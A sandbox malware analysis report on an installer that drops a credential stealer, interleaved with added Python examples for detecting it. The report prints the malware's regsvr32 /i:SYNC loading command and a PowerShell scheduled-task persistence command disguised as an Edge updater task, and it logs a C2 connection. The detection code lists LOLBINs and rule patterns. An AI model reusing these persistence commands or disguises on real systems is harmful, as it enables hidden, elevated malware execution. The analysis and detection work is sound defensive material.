
Windows Analysis Report
8n26gvrXUM.exe

Overview

General Information

Sample name:8n26gvrXUM.exe
Analysis ID:1583336
MD5:c6f9f0ec394a72fb302efbcf74da2ea7
SHA1:143c8fe025fbfd0afe9c88003315bc5a4720439a
SHA256:0a63068ec9d94fef476d9e906fb4920de32e70b77daa24a8b2a0786f23889a1a

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
.NET source code contains very large array initializations
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses Register-ScheduledTask to add task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 8n26gvrXUM.exe (PID: 8948 cmdline: "C:\Users\user\Desktop\8n26gvrXUM.exe" MD5: C6F9F0EC394A72FB302EFBCF74DA2EA7)
    • 8n26gvrXUM.tmp (PID: 8968 cmdline: "C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp" /SL5="$103F0,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" MD5: BCC236A3921E1388596A42B05686FF5E)
      • cmd.exe (PID: 9040 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 9048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 9096 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • 8n26gvrXUM.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: C6F9F0EC394A72FB302EFBCF74DA2EA7)
          • 8n26gvrXUM.tmp (PID: 8252 cmdline: "C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: BCC236A3921E1388596A42B05686FF5E)
            • regsvr32.exe (PID: 8328 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 8364 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 8472 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 8532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
                • powershell.exe (PID: 7648 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • regsvr32.exe (PID: 8808 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 5884 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • svchost.exe (PID: 8960 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
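The process tree above shows the whole persistence chain: the Inno Setup installer drops a PE named netapi32_1.drv into the user's Roaming profile, hands it to regsvr32.exe with /i:SYNC (so DllInstall runs with an attacker-chosen string), and regsvr32 then spawns PowerShell to register a scheduled task that re-runs the same regsvr32 command every minute at the highest run level, under a name that copies the legitimate MicrosoftEdgeUpdateTaskMachineUA{GUID} naming. The following is an added example, not code from the report or from Joe Security, showing how a detection engineer would turn those observations into rules over process-creation telemetry. The events are constructed from the command lines in the tree; the event schema (pid, ppid, image, cmdline) and the rule names are assumptions for the example, and the two "benign control" events are invented so the rules can be shown not to fire on ordinary use.

```python
import re

# Constructed from the command lines in the process tree above. The dict
# schema (pid, ppid, image, cmdline) is an assumption for this example, not
# the field set of any particular EDR or Sysmon configuration.
EVENTS = [
    {"pid": 8252, "ppid": 7040,
     "image": r"C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /VERYSILENT /SUPPRESSMSGBOXES'},
    {"pid": 8328, "ppid": 8252, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'"regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"'},
    {"pid": 8364, "ppid": 8328, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'/s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"'},
    {"pid": 8472, "ppid": 8364, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' }) { exit 0 } else { exit 1 }"'''},
    {"pid": 7648, "ppid": 8364, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -RunLevel Highest"'''},
    # Benign controls (constructed, not from the report): a vendor DLL registered
    # from Program Files, and an administrator registering a nightly backup task.
    {"pid": 4100, "ppid": 900, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''powershell "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Backup\backup.exe') -Trigger (New-ScheduledTaskTrigger -Daily -At 3am) -TaskName 'NightlyBackup'"'''},
]

# Directories an unprivileged user can write to; a COM server or installer
# DLL that regsvr32 loads should not normally live in any of them.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\|\\Temp\\|\\ProgramData\\|\\Users\\Public\\",
    re.I)
# /i[:<string>] makes regsvr32 call DllInstall with that string.
REGSVR32_INSTALL_FLAG = re.compile(r"(?:^|\s)/i(?::|\s|$)", re.I)
# Extensions regsvr32 is normally asked to register.
LOADABLE_EXTS = {"dll", "ocx", "ax", "cpl"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def tokens(cmdline):
    """Split a Windows command line into tokens, honouring double quotes."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def regsvr32_module(cmdline):
    """Path regsvr32 was asked to load: the last token that is a path, not a switch."""
    for tok in reversed(tokens(cmdline)):
        if not tok.startswith("/") and "\\" in tok:
            return tok
    return None


def detect(events):
    """Return (pid, rule_name) pairs for every process event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image, cmd = basename(e["image"]), e["cmdline"]
        if image == "regsvr32.exe":
            module = regsvr32_module(cmd) or ""
            name = basename(module)
            ext = name.rsplit(".", 1)[-1] if "." in name else ""
            # DllInstall invoked on a module sitting in a user-writable directory.
            if REGSVR32_INSTALL_FLAG.search(cmd) and USER_WRITABLE.search(module):
                findings.append((e["pid"], "regsvr32_dllinstall_from_user_path"))
            # A .drv (or any non-DLL extension) is still mapped as a PE by
            # regsvr32; the extension only makes the file look like a system driver.
            if module and ext not in LOADABLE_EXTS:
                findings.append((e["pid"], "regsvr32_loads_non_dll_extension"))
        elif image == "powershell.exe":
            parent = by_pid.get(e["ppid"])
            # regsvr32 has no legitimate reason to start a shell.
            if parent and basename(parent["image"]) == "regsvr32.exe":
                findings.append((e["pid"], "powershell_spawned_by_regsvr32"))
            # Persistence whose action is regsvr32 itself rather than an installed program.
            if re.search(r"Register-ScheduledTask", cmd, re.I) and \
               re.search(r"-Execute\s+\\?\"?regsvr32", cmd, re.I):
                findings.append((e["pid"], "scheduled_task_action_is_regsvr32"))
            # Elevated, minute-by-minute re-execution is not how updaters behave.
            if re.search(r"-RunLevel\s+Highest", cmd, re.I) and \
               re.search(r"-RepetitionInterval", cmd, re.I):
                findings.append((e["pid"], "elevated_repeating_task"))
    return findings


def rules_for(pid, events=EVENTS):
    """Sorted rule names that fired for one PID (convenience for triage and tests)."""
    return sorted(rule for p, rule in detect(events) if p == pid)


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(pid, rule)
```

Run against the constructed events, both regsvr32 processes (PIDs 8328 and 8364) fire the user-path and non-DLL rules, the task-registration PowerShell (PID 7648) fires all three PowerShell rules, the malware's own "does my task already exist" check (PID 8472) fires only on its parent, and the two benign controls stay silent. Keying on the task's action rather than its name matters here: MicrosoftEdgeUpdateTaskMachineUA{GUID} is the naming scheme of the real Edge updater tasks, so a name-based rule would produce either false positives or nothing at all.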
No configs have been found
Source | Rule | Description | Author | Strings
0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: regsvr32.exe PID: 8808 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

      System Summary

      Source: Process started | Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 8364, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 8472, ProcessName: powershell.exe
      Source: Network Connection | Author: Dmitriy Lifanov, oscd.community | Data: DestinationIp: 144.202.34.112, DestinationIsIpv6: false, DestinationPort: 56001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 8808, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49715
      Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp, ParentProcessId: 8252, ParentProcessName: 8n26gvrXUM.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ProcessId: 8328, ProcessName: regsvr32.exe
      Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 8364, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 8472, ProcessName: powershell.exe
      Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 908, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8960, ProcessName: svchost.exe

      HIPS / PFW / Operating System Protection Evasion

      Source: Process started | Author: Joe Security | Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 8364, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 8472, ProcessName: powershell.exe

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2025-01-02T14:08:46.826838+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 144.202.34.112 | 56001 | 192.168.11.20 | 49715 | TCP


      AV Detection

      Source: C:\Users\user\AppData\Roaming\is-J08NI.tmp | ReversingLabs: Detection: 43%
      Source: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy) | ReversingLabs: Detection: 43%
      Source: 8n26gvrXUM.exe | ReversingLabs: Detection: 50%
      Source: 8n26gvrXUM.exe | Virustotal: Detection: 55%
      Source: C:\Windows\System32\regsvr32.exe | Code function: 9_2_00007FFD348FA1B0 BCryptGenRandom,SystemFunction036,9_2_00007FFD348FA1B0
      Source: C:\Windows\System32\regsvr32.exe | Code function: 14_2_00007FFD348FA1B0 BCryptGenRandom,SystemFunction036,14_2_00007FFD348FA1B0
      Source: 8n26gvrXUM.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 8n26gvrXUM.tmp, 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmp, 8n26gvrXUM.tmp, 00000001.00000003.884415031.0000000003370000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.00000000036C8000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.7.dr

      Networking

      Source: Network traffic | Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 144.202.34.112:56001 -> 192.168.11.20:49715
      Source: C:\Windows\System32\regsvr32.exe | Network Connect: 144.202.34.112 56001
      Source: global traffic | TCP traffic: 192.168.11.20:49715 -> 144.202.34.112:56001
      Source: Joe Sandbox View | ASN Name: AS-CHOOPAUS AS-CHOOPAUS
      Source: unknown | TCP traffic detected without corresponding DNS query: 144.202.34.112
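The networking signatures above combine three weak signals into a strong one: the connection is initiated by regsvr32.exe (a signed system binary with no reason to talk to the internet), it goes to a hard-coded IP with no DNS query in the capture, and it uses a port (56001) that no ordinary workstation protocol uses; Suricata then ties the destination to an AsyncRAT-style TLS certificate. The following added example, not part of the report and not Joe Security's or Suricata's logic, shows the host-side correlation a SOC would run over process network and DNS telemetry to reproduce the "TCP traffic without corresponding DNS query" verdict. The events are constructed after the shape of Sysmon Event ID 22 (DNS query) and Event ID 3 (network connection); the regsvr32 connection is the one from the report, the remaining hosts use RFC 5737 documentation addresses, and the field names, window size and port list are assumptions for the example.

```python
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Lookback within which a DNS answer "explains" a later connection to that IP.
DNS_WINDOW = timedelta(minutes=10)
# Ports a workstation routinely talks to; anything else is worth a second look.
COMMON_PORTS = {22, 25, 53, 80, 123, 443, 465, 587, 993, 995, 8080, 8443}
# Signed Windows binaries that have no business opening outbound sockets.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "regasm.exe", "regsvcs.exe"}
# RFC 1918, loopback and link-local, listed explicitly: ipaddress.is_private
# also treats the RFC 5737 documentation ranges used below as private.
INTERNAL = [ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Constructed telemetry modelled on Sysmon EID 22 (DNS query) and EID 3
# (network connection). Only the regsvr32 line comes from the report.
EVENTS = [
    {"t": "2025-01-02T14:07:50", "id": 22, "image": r"C:\Program Files\Browser\browser.exe",
     "query": "www.example.com", "answers": ["203.0.113.10"]},
    {"t": "2025-01-02T14:07:51", "id": 3, "image": r"C:\Program Files\Browser\browser.exe",
     "dst": "203.0.113.10", "port": 443},
    {"t": "2025-01-02T14:08:46", "id": 3, "image": r"C:\Windows\System32\regsvr32.exe",
     "dst": "144.202.34.112", "port": 56001},
    {"t": "2025-01-02T14:09:00", "id": 3, "image": r"C:\Windows\System32\svchost.exe",
     "dst": "192.168.11.1", "port": 445},
    {"t": "2025-01-02T14:09:30", "id": 3, "image": r"C:\Program Files\Updater\updater.exe",
     "dst": "198.51.100.7", "port": 443},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_internal(ip_text):
    """True for addresses that never need a DNS lookup to be reachable."""
    ip = ip_address(ip_text)
    return any(ip in net for net in INTERNAL)


def correlate(events):
    """Return (image, dst, port, reasons) for external connections that look odd.

    Events are replayed in time order so that each connection is judged only
    against DNS answers that preceded it, which is how a streaming detector
    would see them.
    """
    last_answer = {}  # ip -> time it was most recently returned by a DNS query
    findings = []
    for ev in sorted(events, key=lambda e: e["t"]):
        ts = datetime.fromisoformat(ev["t"])
        if ev["id"] == 22:
            for ip in ev["answers"]:
                last_answer[ip] = ts
            continue
        if ev["id"] != 3 or is_internal(ev["dst"]):
            continue
        reasons = []
        seen = last_answer.get(ev["dst"])
        if seen is None or ts - seen > DNS_WINDOW:
            reasons.append("no_preceding_dns")      # hard-coded C2 address
        if ev["port"] not in COMMON_PORTS:
            reasons.append("non_standard_port")     # e.g. 56001 in the report
        if basename(ev["image"]) in LOLBINS:
            reasons.append("lolbin_initiated")      # regsvr32 as the client
        if reasons:
            findings.append((ev["image"], ev["dst"], ev["port"], reasons))
    return findings


if __name__ == "__main__":
    for image, dst, port, reasons in correlate(EVENTS):
        print(f"{image} -> {dst}:{port}  {', '.join(reasons)}")
```

On the constructed input the browser connection is explained by the query one second earlier and stays quiet, the SMB connection to a private address is skipped, the updater's DNS-less HTTPS connection is reported with a single reason, and the regsvr32 connection collects all three. Treat a lone "no_preceding_dns" as low confidence: cached resolutions, DNS over HTTPS, software with pinned update IPs, or a sensor that simply missed the query all produce it. It is the stacking of reasons, as in this report, that justifies escalation.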
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 0000000F.00000002.1135113573.00000208F6821000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft.c
      Source: svchost.exe, 00000011.00000002.2138830717.000001C713847000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.dr | String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
